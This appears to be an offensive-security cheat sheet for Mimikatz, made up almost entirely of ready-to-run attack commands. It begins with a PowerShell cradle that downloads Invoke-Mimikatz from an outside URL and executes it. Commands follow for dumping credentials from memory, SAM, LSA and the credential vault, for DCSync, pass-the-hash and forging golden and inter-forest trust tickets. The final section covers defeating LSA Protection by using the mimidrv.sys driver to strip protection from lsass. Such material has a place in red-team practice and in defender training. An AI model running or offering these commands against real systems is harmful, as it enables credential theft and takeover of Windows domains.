Mimikatz

URL: https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1

Dump Credentials

# Download and execute in cradle
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')
 
 #Dump creds from memory
Invoke-Mimikatz -DumpCreds

# DCSync Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"'

# Dump local passwords
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'

# Dump Credential Vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

# Dump credentials on remote systems
Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02")

Dump Domain Credentials

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Spawn PowerShell (with compromised NTLM hash)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"'

Forge Inter-domain trust ticket

# Obtain trust key between current domain and external domain
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# An inter-forest TGT can be forged
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"'

Over pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm:<ntlmhash> /run:powershell.exe"'

Protection Bypass

The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection.

We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled

This can be bypassed by utilizing the mimidrv.sys driver file which is included as a separate file with mimikatz.

The mimidrv.sys driver file needs to exists in the same directory as mimikatz.exe.

The driver can be loaded by running the command !+ in Mimikatz. After doing so the following command can be execute to protect the mimikatz.exe process.

!processProtect /process:mimikatz.exe

The same command with the /remove flag can be used to strip the process protection from a process such as lsass.exe

!processprotect /process:lsass.exe /remove

From here we should be free to perform actions against LSASS and dump credentials from it.

mimikatz.exe sekurlsa::logonpasswords